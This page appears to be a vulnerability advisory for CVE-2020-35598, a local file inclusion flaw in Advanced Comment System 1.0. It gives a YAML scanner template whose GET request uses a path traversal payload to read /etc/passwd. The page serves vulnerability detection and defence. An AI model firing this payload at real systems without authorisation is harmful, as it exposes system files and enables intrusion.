CVE-2020-35598: Advanced Comment System 1.0 - Local File Inclusion

2025-08-01 Advanced Comment System PoC Public

Description

ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.

PoC

id: CVE-2020-35598

info:
  name: Advanced Comment System 1.0 - Local File Inclusion
  author: daffainfo
  severity: high
  description: ACS Advanced Comment System 1.0 is affected by local file inclusion via an advanced_component_system/index.php?ACS_path=..%2f URI.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the local file inclusion vulnerability in the Advanced Comment System 1.0.
  reference:
    - https://www.exploit-db.com/exploits/49343
    - https://seclists.org/fulldisclosure/2020/Dec/13
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35598
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-35598
    cwe-id: CWE-22
    epss-score: 0.21
    epss-percentile: 0.97442
    cpe: cpe:2.3:a:advanced_comment_system_project:advanced_comment_system:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: advanced_comment_system_project
    product: advanced_comment_system
  tags: cve,cve2020,acs,edb,seclists,lfi,advanced_comment_system_project,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022008570bdb4580bb98c17e0652d855e482f8f3eb8d2cf94313ad0e27ea661915b0022100cd92a2b53c3ae51ba0294d03df3b2369baffdb3e5c640b1ef5beb4816d91c1f9:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities